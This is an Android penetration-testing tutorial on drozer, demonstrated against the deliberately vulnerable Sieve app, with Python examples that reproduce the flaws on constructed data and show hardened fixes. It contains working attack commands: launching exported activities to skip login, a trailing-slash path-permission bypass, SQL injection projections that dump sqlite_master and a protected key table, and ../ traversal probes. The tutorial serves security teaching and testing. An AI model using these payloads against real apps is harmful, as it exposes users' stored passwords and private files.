Checking app security with Drozer

Drozer is a staple of the Android pentester's toolkit. It runs as an agent app on the device and exposes a console on your workstation, from which you can enumerate an application's components and probe its exported attack surface without touching the APK.

Drozer is packaged for Kali Linux and other penetration-testing distributions.

Drozer Features:

  1. Getting information about a package
  2. Determining the attack surface
  3. Starting activities
  4. Reading from content providers
  5. Interaction with services
  6. Additional options

1. Getting information about a package

Drozer can list the packages installed on the connected device and report details about any one of them.

To list all packages installed on the device:
dz> run app.package.list

To filter that list by a substring of the package name:
dz> run app.package.list -f <your_string>

To get basic information about a package (version, data directory, APK path, UID, and the permissions it uses and defines):
dz> run app.package.info -a <package_name>

2. Determining the attack surface

This is where the vulnerability hunting starts. An exported component can be reached by any other app on the device, so the first step is to count how many of each kind the target exports. A component with no explicit android:exported attribute is exported by default when it declares an intent filter (providers are the exception and default to not exported):

  • Activities
  • Broadcast receivers
  • Content providers
  • Services

To get the count of exported activities, broadcast receivers, content providers and services, and whether the app is debuggable:
dz> run app.package.attacksurface <package_name>
Attack Surface:
  3 activities exported
  0 broadcast receivers exported
  2 content providers exported
  2 services exported
    is debuggable

The last line means android:debuggable is set on the application, so a debugger can be attached to its process and run-as can be used to read its private data directory.
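
The rule drozer applies when it counts exported components can be reproduced offline against a decoded AndroidManifest.xml. The following is an added example, not drozer's own code: it uses only the Python standard library, and the manifest it parses is constructed for the example (the package name and component names describe no real app). Drozer itself asks the live PackageManager rather than parsing the manifest, and this version ignores <activity-alias> entries and does not look at android:permission, which is an assumption to keep the example short.

```python
"""Compute an app's exported attack surface from a decoded AndroidManifest.xml.

Added example, not drozer's code. A component is exported when
android:exported="true"; when the attribute is absent, activities, receivers
and services are exported if they declare at least one <intent-filter>,
while providers default to not exported (API 17 and later).
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "receiver", "provider", "service")

# Constructed manifest, shaped like apktool output; not taken from any real app.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.demo">
  <application android:label="Demo" android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".PINActivity" android:exported="true"/>
    <activity android:name=".SettingsActivity" android:exported="false">
      <intent-filter><action android:name="com.example.demo.SETTINGS"/></intent-filter>
    </activity>
    <receiver android:name=".SyncReceiver"/>
    <provider android:name=".DBContentProvider"
              android:authorities="com.example.demo.DBContentProvider"
              android:exported="true"/>
    <provider android:name=".CacheProvider"
              android:authorities="com.example.demo.CacheProvider"/>
    <service android:name=".AuthService" android:exported="true"/>
    <service android:name=".CryptoService">
      <intent-filter><action android:name="com.example.demo.CRYPTO"/></intent-filter>
    </service>
  </application>
</manifest>
"""


def android_attr(elem, name):
    """Read an attribute from the android: namespace (None if absent)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component):
    """Explicit android:exported wins; otherwise apply the intent-filter default.
    Simplification: <activity-alias> and android:permission are not considered."""
    explicit = android_attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if component.tag == "provider":
        return False
    return component.find("intent-filter") is not None


def attack_surface(manifest_xml):
    """Return exported-component counts, their names, and the debuggable flag."""
    app = ET.fromstring(manifest_xml).find("application")
    counts = dict.fromkeys(COMPONENT_TAGS, 0)
    exported = []
    for component in app:
        if component.tag in counts and is_exported(component):
            counts[component.tag] += 1
            exported.append((component.tag, android_attr(component, "name")))
    debuggable = (android_attr(app, "debuggable") or "false").lower() == "true"
    return {"counts": counts, "exported": exported, "debuggable": debuggable}


def report(manifest_xml):
    """Format the result the way app.package.attacksurface prints it."""
    result = attack_surface(manifest_xml)
    c = result["counts"]
    lines = [
        "Attack Surface:",
        "  %d activities exported" % c["activity"],
        "  %d broadcast receivers exported" % c["receiver"],
        "  %d content providers exported" % c["provider"],
        "  %d services exported" % c["service"],
    ]
    if result["debuggable"]:
        lines.append("    is debuggable")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_MANIFEST))
    for kind, name in attack_surface(SAMPLE_MANIFEST)["exported"]:
        print("  %-8s %s" % (kind, name))
```

For the constructed manifest this reports 2 activities (MainActivity through its launcher filter, PINActivity explicitly), 0 receivers, 1 provider and 2 services, plus the debuggable flag; SettingsActivity is not counted because its explicit android:exported="false" overrides the intent filter.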

3. Starting activities

Next we launch the exported activities directly. An exported activity can be started by any app on the device, so if a screen that should sit behind the login is exported, starting it skips the authentication flow entirely.

To list the activities of a package:
dz> run app.activity.info -a <package_name>

To start a selected activity:
dz> run app.activity.start --component <package_name> <activity_name>

4. Reading from content providers

Next we collect more information about the content providers the application exports.

To get info about the content providers:
dz> run app.provider.info -a <package_name>

Example Result:
Package: com.mwr.example.sieve
  Authority: com.mwr.example.sieve.DBContentProvider
  Read Permission: null
  Write Permission: null
  Content Provider: com.mwr.example.sieve.DBContentProvider
  Multiprocess Allowed: True
  Grant Uri Permissions: False
  Path Permissions:
    Path: /Keys
      Type: PATTERN_LITERAL
      Read Permission: com.mwr.example.sieve.READ_KEYS
      Write Permission: com.mwr.example.sieve.WRITE_KEYS

Read this carefully: the provider as a whole requires no permission (both are null), and only the /Keys path is protected. Every other path it serves is readable and writable by any app on the device.

The provider is called DBContentProvider, a database-backed content provider. The content URIs it serves are not declared anywhere we can read, so they have to be guessed; drozer's scanner.provider.finduris module combines several guessing strategies (including content:// strings pulled from the APK) and reports which candidate URIs actually answer a query.

To get the content URIs for the selected package:
dz> run scanner.provider.finduris -a <your_package>

Example Result:
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
  ...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys/
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/

Note that /Keys is refused but /Keys/ is accessible: the path permission is a literal match on /Keys, so the trailing slash sidesteps it.

We can now use other drozer modules to read from these content URIs or even to modify the database.

To retrieve data from a content URI (--vertical prints one field per line):
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical

     _id: 1
 service: Email
username: incognitoguy50
password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64-encoded)
   email: incognitoguy50@gmail.com

The companion modules app.provider.insert, app.provider.update and app.provider.delete take the same URI and modify rows.

Content providers are usually backed by SQLite, and a provider that splices the caller-supplied projection and selection straight into its query string is open to SQL injection. A lone single quote in either field is enough to find out.

To test for SQL injection:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords

dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')

The provider passes SQLite's error straight back to the caller, and the message includes the whole statement, so we know exactly where our input lands: SELECT <projection> FROM Passwords WHERE (<selection>). Injecting into the projection lets us replace the FROM clause and read any table; sqlite_master first, to enumerate the schema (note the single quotes around table inside the double-quoted argument):

To list all tables via SQL injection:
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"

| type  | name             | tbl_name         | rootpage | sql             |
| table | android_metadata | android_metadata | 3        | CREATE TABLE... |
| table | Passwords        | Passwords        | 4        | CREATE TABLE... |
| table | Key              | Key              | 5        | CREATE TABLE... |

The same projection trick with --projection "* FROM Key;--" dumps the Key table that the path permission on /Keys was supposed to protect.
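
The injection above can be reproduced, and the fix shown, without a device. The following is an added example, not drozer's or Sieve's code: it builds an in-memory SQLite database whose schema and single row are constructed to mirror the output on this page (the password value is dummy data), runs the page's projection and selection payloads through a query builder that concatenates its inputs the way the leaked error messages reveal, and then runs the same payloads through a hardened builder. The hardened builder is a miniature of what SQLiteQueryBuilder with a projection map and setStrict(true) enforces on Android, and its token grammar is an assumption for the example, not Android's implementation.

```python
"""Reproduce the projection/selection injection against an in-memory SQLite
database, then the query construction that stops it.

Added example, not drozer's or Sieve's code. Vulnerable builder:
    SELECT <projection> FROM Passwords WHERE (<selection>)
"""
import re
import sqlite3

TABLE = "Passwords"
COLUMNS = ("_id", "service", "username", "password", "email")
TABLE_DUMP = "* FROM SQLITE_MASTER WHERE type='table';--"   # payload from the page


def open_db():
    """Constructed sample database standing in for the provider's backing store."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE android_metadata (locale TEXT);
        CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT,
                                username TEXT, password BLOB, email TEXT);
        CREATE TABLE Key (Password TEXT, pin TEXT);
        INSERT INTO Passwords VALUES (1, 'Email', 'incognitoguy50',
                                      'PSFjqXIMVa5NJFudgDuuLVgJYFD+8w==',
                                      'incognitoguy50@gmail.com');
    """)
    return db


def vulnerable_query(db, projection=None, selection=None):
    """A naive ContentProvider.query(): caller input is spliced into the SQL.
    On a syntax error the SQLite message, which echoes our input and the
    statement, is returned to the caller, as drozer showed above."""
    cols = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM %s" % (cols, TABLE)
    if selection:
        sql += " WHERE (%s)" % selection
    try:
        return db.execute(sql).fetchall()
    except sqlite3.OperationalError as err:
        return "%s, while compiling: %s" % (err, sql)


def list_tables_via_injection(db):
    """Use the projection to swap the FROM clause for sqlite_master."""
    rows = vulnerable_query(db, projection=[TABLE_DUMP])
    return [row[1] for row in rows]  # column 1 of sqlite_master is the name


_TOKEN = re.compile(r"\w+|[=<>!]+|\?")


def hardened_query(db, projection=None, selection=None, args=()):
    """Miniature of a strict SQLiteQueryBuilder: projection entries must be
    known columns, and the selection may contain only known columns,
    comparison operators, AND/OR and ? placeholders. Values are never part
    of the SQL text; they travel separately as bound parameters."""
    cols = tuple(projection) if projection else COLUMNS
    for col in cols:
        if col not in COLUMNS:
            raise ValueError("unknown column in projection: %r" % col)
    sql = "SELECT %s FROM %s" % (", ".join(cols), TABLE)
    if selection:
        tokens = _TOKEN.findall(selection)
        # anything the tokenizer skipped (quotes, parentheses, semicolons) is a rejection
        if "".join(tokens) != re.sub(r"\s+", "", selection):
            raise ValueError("selection contains characters outside the grammar")
        for tok in tokens:
            if not (tok in COLUMNS or tok.upper() in ("AND", "OR") or tok == "?"
                    or re.fullmatch(r"[=<>!]+", tok)):
                raise ValueError("disallowed token in selection: %r" % tok)
        sql += " WHERE (%s)" % selection
    return db.execute(sql, args).fetchall()


def hardened_rejects(db, **kwargs):
    """True when hardened_query refuses the request."""
    try:
        hardened_query(db, **kwargs)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = open_db()
    print(vulnerable_query(db, projection=["'"]))
    print(list_tables_via_injection(db))
    print(hardened_query(db, selection="service = ?", args=("Email",)))
```

Run stand-alone, the vulnerable path prints the same "unrecognized token" message the page shows and then the three table names android_metadata, Passwords and Key; the hardened path answers a legitimate parameterised lookup but refuses the schema-dump projection, the lone quote, and even a literal such as 1 = 1, because values must arrive as bound parameters.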

A content provider does not have to be backed by a database. Through openFile() it can hand out file descriptors, which lets an app share files that the sandbox would otherwise keep private. If the provider builds the file path from the URI without validating it, the same mechanism serves up any file the app itself can read, including files outside its own directory.

To read a file through a provider:
dz> run app.provider.read <URI>

To download a file through a provider to the local machine:
dz> run app.provider.download <URI> <local_path>

To test every discovered URI for SQL injection automatically:
dz> run scanner.provider.injection -a <package_name>

To test every discovered URI for directory traversal (paths such as ../../../etc/hosts):
dz> run scanner.provider.traversal -a <package_name>
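
What scanner.provider.traversal is probing for is the path check behind openFile(). The following is an added example, not drozer's or Sieve's code: a temporary directory stands in for the app's private files directory and a second temporary file for data outside it (both constructed here), resolve_vulnerable mirrors an openFile() that builds a File from the URI path with no validation, and resolve_hardened adds the canonicalise-then-compare check that keeps the path inside the directory. Because realpath resolves symlinks before the comparison, a symlink planted inside the directory that points outside it is caught as well.

```python
"""Path handling behind a file-backed content provider.

Added example, not drozer's or Sieve's code. Shows the traversal that
scanner.provider.traversal looks for and the check that stops it.
"""
import os
import tempfile


def resolve_vulnerable(files_dir, uri_path):
    """No validation: '..' segments walk out of files_dir, and an absolute
    URI path replaces it outright (os.path.join discards the left side)."""
    return os.path.join(files_dir, uri_path)


def resolve_hardened(files_dir, uri_path):
    """Canonicalise, then require the result to remain under files_dir."""
    base = os.path.realpath(files_dir)
    candidate = os.path.realpath(os.path.join(base, uri_path.lstrip("/")))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError("URI path escapes the provider directory: %r" % uri_path)
    return candidate


def read_via_provider(resolver, files_dir, uri_path):
    """Stand-in for ContentProvider.openFile() followed by a read."""
    with open(resolver(files_dir, uri_path), "rb") as fh:
        return fh.read()


def demo():
    """Build a throwaway sandbox, then read through both resolvers.
    Returns a dict of outcomes so the behaviour can be checked, not eyeballed."""
    outcomes = {}
    with tempfile.TemporaryDirectory() as root:
        files_dir = os.path.join(root, "app", "files")   # the app's private directory
        os.makedirs(files_dir)
        with open(os.path.join(files_dir, "backup.db"), "wb") as fh:
            fh.write(b"constructed backup contents")
        secret = os.path.join(root, "secret.txt")        # outside files_dir
        with open(secret, "wb") as fh:
            fh.write(b"outside the sandbox")

        outcomes["legit"] = read_via_provider(resolve_vulnerable, files_dir, "backup.db")
        outcomes["dotdot_vulnerable"] = read_via_provider(
            resolve_vulnerable, files_dir, "../../secret.txt")
        outcomes["absolute_vulnerable"] = read_via_provider(
            resolve_vulnerable, files_dir, secret)
        outcomes["legit_hardened"] = read_via_provider(resolve_hardened, files_dir, "backup.db")
        try:
            read_via_provider(resolve_hardened, files_dir, "../../secret.txt")
            outcomes["dotdot_hardened"] = "allowed"
        except PermissionError:
            outcomes["dotdot_hardened"] = "blocked"
    return outcomes


if __name__ == "__main__":
    for label, value in demo().items():
        print("%-20s %r" % (label, value))
```

The vulnerable resolver reads the outside file through both a ../ sequence and an absolute path, which is exactly what a content URI such as content://<authority>/../../secret.txt or content://<authority>/etc/hosts turns into; the hardened resolver still serves backup.db but raises on the escape.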

5. Interaction with services

Exported services can be bound to by any app on the device. Start by asking Drozer which services the package exports and which permission, if any, guards each one; the app.service.send module can then send Messages to a bound service.

To get details about the exported services:
dz> run app.service.info -a <package_name>

6. Additional options

Other modules worth knowing:

  • shell.start – start an interactive Linux shell on the device, running in the drozer agent's context.

  • tools.file.upload / tools.file.download – copy files to / from the Android device.

  • tools.setup.busybox / tools.setup.minimalsu – install useful binaries on the device.
